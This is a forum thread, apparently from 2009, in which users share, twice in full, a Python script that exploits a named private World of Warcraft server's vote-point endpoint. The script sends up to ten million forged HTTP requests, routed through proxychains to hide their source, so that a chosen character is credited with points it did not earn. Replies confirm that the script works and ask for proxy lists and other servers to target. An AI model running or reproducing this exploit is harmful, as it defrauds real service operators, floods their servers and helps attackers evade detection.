removed for safety
if a mod can remove the posts with the code inside it will be better
removed for safety
if a mod can remove the posts with the code inside it will be better
Last edited by karapidiola; 02-25-2009 at 09:19 AM.
virus scan
it does seem suspiciuos...please someone test
super u are script kiddie or what? python scripts are open source u can open with notepad and see the ****ing source code who will write trojans/backdors/malware in python hahaha
for anyone wondering what's in it
Code:#coding by DarkInjection And Post_Mortem Crew #from friends to friends #anyway this program just use a request that i have found in the site : eternion-wow.com #u can call it "bug" in our case getpoint.php this!!!! #so lets get the advantage of this bug and exploit the points:) #i hope this will be keept.... private..... #start.... #btw this program its used to be run under linux cos u need a program called proxychains example: proxychains python vote_hack.py #posible can work in windows to..... from socket import * from time import sleep target = 'www.eternion-wow.com' port = 80 request_pt1 = '/getpoint.php?url=xtremetop200&char=' request_pt2 = '&sn=1234809692227' print('[-]getpoint.php Vote Points Exploit By DarkInjection') print('[-]Usage Its Simple Just Give The Name To Add Some Points And Thats It') print('[-]Not Every Request Mean A Point Maybe 45 Requests = 1-3 points....\n') name = raw_input('[*]Enter The Name To Vote Exploit: ') if(len(name) > 0): print('[-]Name : '+name) else: print('Name Its Empty??WTF....') exit(1) #top200 server_request ='GET ' server_request +=request_pt1 server_request +=name server_request +=request_pt2 server_request +=' HTTP/1.1\r\n' server_request +='Host: '+target+'\r\n' server_request +='User-Agent: Mozilla/5.0\r\n' server_request +='Keep-Alive: 300\r\n' server_request +='Connection: Keep-Alive\r\n\r\n' #server_request +='Cookie: PHPSESSID=b98fd4a3e307a1f63c71d02cb5dfbfe3; TIMEA=1234809690; TYPEA=94.71.240.1901\r\n\r\n' count = 10000000 print('[*]Requesting The Server ! This Maybe Take A Wile...') for i in range(0,int(count)): try: i = socket(AF_INET,SOCK_STREAM) except: print('[/]Error In SOcket Function') exit(1) try: i.connect((target,int(port))) except: print('[/]Error In Connect()') exit(1) try: i.send(server_request) except: print('[/]Error In Send()') exit(1)
ZomgZippo you can post if it works(im sure it does....)
Before actually bothering. How many points do you get
90 points in almost 3 hours maybe more
if u are using proxychains and got a huge proxy list u can make x5 points faster so 450 points in 3 hours...
for fast points u need also a good bandwith
Meh Eternion WoW is crap anyway. Thanks for sharing though
The serv is epic fail.. Thanks anyway for the release +Rep
Mediafire links please?
Everyone, stop posting EternionWoW/WoWAXA/AntWoW exploits/hacks.. cause the fking site n00bs i.e. Fuzzymini is here.
Thanks for the contribution to the community!
abit slow, but works
and thx for the quick response +rep
btw here is a rapid fire link
http://www.mediafire.com/?sharekey=d...4e75f6e8ebb871
or copy this into notepad and save it with a .py extention
Code:#coding by DarkInjection And Post_Mortem Crew #from friends to friends #anyway this program just use a request that i have found in the site : eternion-wow.com #u can call it "bug" in our case getpoint.php this!!!! #so lets get the advantage of this bug and exploit the points:) #i hope this will be keept.... private..... #start.... #btw this program its used to be run under linux cos u need a program called proxychains example: proxychains python vote_hack.py #posible can work in windows to..... from socket import * from time import sleep target = 'www.eternion-wow.com' port = 80 request_pt1 = '/getpoint.php?url=xtremetop200&char=' request_pt2 = '&sn=1234809692227' print('[-]getpoint.php Vote Points Exploit By DarkInjection') print('[-]Usage Its Simple Just Give The Name To Add Some Points And Thats It') print('[-]Not Every Request Mean A Point Maybe 45 Requests = 1-3 points....\n') name = raw_input('[*]Enter The Name To Vote Exploit: ') if(len(name) > 0): print('[-]Name : '+name) else: print('Name Its Empty??WTF....') exit(1) #top200 server_request ='GET ' server_request +=request_pt1 server_request +=name server_request +=request_pt2 server_request +=' HTTP/1.1\r\n' server_request +='Host: '+target+'\r\n' server_request +='User-Agent: Mozilla/5.0\r\n' server_request +='Keep-Alive: 300\r\n' server_request +='Connection: Keep-Alive\r\n\r\n' #server_request +='Cookie: PHPSESSID=b98fd4a3e307a1f63c71d02cb5dfbfe3; TIMEA=1234809690; TYPEA=94.71.240.1901\r\n\r\n' count = 10000000 print('[*]Requesting The Server ! This Maybe Take A Wile...') for i in range(0,int(count)): try: i = socket(AF_INET,SOCK_STREAM) except: print('[/]Error In SOcket Function') exit(1) try: i.connect((target,int(port))) except: print('[/]Error In Connect()') exit(1) try: i.send(server_request) except: print('[/]Error In Send()') exit(1)
Last edited by bart_bart; 02-17-2009 at 09:10 PM.
does toher servers does this owrk on?
Who have a good proxy list please ?
guyz last night i GOT 'Your Vote Points: 16667' i dont know but now its faster than before
my points increased by 50 evey sec lol :P